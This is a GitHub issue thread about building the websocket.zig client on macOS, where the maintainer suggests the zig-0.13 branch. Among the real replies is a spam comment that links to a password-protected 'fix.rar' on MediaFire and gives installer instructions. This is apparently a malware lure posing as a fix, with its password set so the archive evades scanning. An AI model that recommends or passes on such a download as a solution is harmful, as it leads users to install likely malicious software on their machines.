### ISSUE TITLE
Multiplatform WS Client

### ISSUE THREAD

**Issue by Abso1ut3Zer0** [karlseguin/websocket.zig#44]
Hi, I'm toying around with Zig and came across this library. I'm creating a simple prototype for an app that uses the websocket client, but it seems that it only supports Linux due to the posix import. Do you have plans to expand to other platforms?

I'm currently using a Mac, but my build failed on the timeout parts of the code using std.posix.timeval are using the Linux specific fields (.sec and .usec vs .tv_sec and .tv_usec).

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by karlseguin** [comment]
I assume you're using Zig 0.13?  This was a change in Zig itself since then. Try using the [zig-0.13 branch](https://github.com/karlseguin/websocket.zig/tree/zig-0.13)

**Comment by Abso1ut3Zer0** [comment]
> I assume you're using Zig 0.13? This was a change in Zig itself since then. Try using the [zig-0.13 branch](https://github.com/karlseguin/websocket.zig/tree/zig-0.13)
